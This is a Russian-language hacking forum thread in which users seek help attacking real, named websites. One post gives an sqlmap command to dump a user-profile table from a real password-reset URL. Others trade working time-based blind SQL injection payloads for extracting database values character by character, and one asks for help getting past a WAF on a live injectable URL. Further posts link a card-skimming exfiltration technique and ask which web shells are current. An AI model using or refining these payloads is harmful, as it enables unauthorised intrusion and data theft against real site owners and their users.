Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Duble

    Duble New Member

    Joined:
    28 Oct 2015
    Messages:
    30
    Likes Received:
    0
    Reputations:
    0
    dell
     
    #2861 Duble, 20 Jun 2020
    Last edited: 20 Jun 2020
  2. kostea

    kostea New Member

    Joined:
    23 Dec 2015
    Messages:
    29
    Likes Received:
    0
    Reputations:
    0
    Помогите пожалуйста, возвращает пустой результат

    Code:
     --url="https://eos.aidainternational.org/ResetPassword/3297bc2d-815c-46fd-9488-57433cb3de5a*" --flush-session --risk=3 --level=3 -D dbo -T UserProfiles --dump
     
    #2862 kostea, 23 Jun 2020
    Last edited: 23 Jun 2020
  3. testvalue

    testvalue New Member

    Joined:
    30 May 2020
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Привет.

    Подскажите, плиз.

    Как правильно видоизменить нагрузку вида
    Code:
    'OR(if(now()=sysdate(),sleep(3),0))OR'*/
    для того чтобы начать перебирать символы, например, чтобы получить значение
    Code:
    version()
    базы данных.

    Не хватает понимания :(

    По идее так
    Code:
    'OR(if(substring(version((),1,1)='m',sleep(3),0))OR'*/
    , да?

    Cпасибо.
     
  4. fandor9

    fandor9 Well-Known Member

    Joined:
    16 Nov 2018
    Messages:
    411
    Likes Received:
    616
    Reputations:
    19
    Что-бы узнать имеет-ли 2-ой символ значение 'A':
    Code:
    'OR(if(substring(version(),2,1)='А'),sleep(3),0))OR'*/
    ещё лучше перебирать по ASCII (53='5') т.е. является ли 2ой символ цифрой 5:
    Code:
    'OR(if(ASCII(SUBSTR(VERSION(),2,1))=53),sleep(3),0))OR'*/
     
    testvalue likes this.
  5. testvalue

    testvalue New Member

    Joined:
    30 May 2020
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Спасибо большое, дружище, сейчас пойду пробовать :)
     
  6. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    560
    Likes Received:
    1,063
    Reputations:
    357
    Оказалось немного иначе, но смысл как раз в затруднении детекта.

    Подробный разбор:
    https://blog.malwarebytes.com/threa...ata-exfiltrates-credit-cards-via-image-files/

    Опус от автора техники:
    https://xss.is/threads/39071/
     
    fandor9 likes this.
  7. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    405
    Reputations:
    196
    Какие шеллы сейчас актуальны?
     
  8. testvalue

    testvalue New Member

    Joined:
    30 May 2020
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Привет.

    Помогите докрутить скулю и обойти WAF.

    https://www.hbo.ro/TitleDetail.aspx?ScheduleId='OR(if(now()=sysdate(),sleep(5),0))OR'xxx -> True, задержка 5 секунд

    На sleep() реагирует, и видно, что там есть скуля, но при попытке извлечь например, version() или user() cудя по всему срабатывает WAF.

    Пытался через вектор 'OR(if(ASCII(SUBSTR(VERSION(),1,1))=53),sleep(3),0))OR', но облом.

    Спасибо.
     
Loading...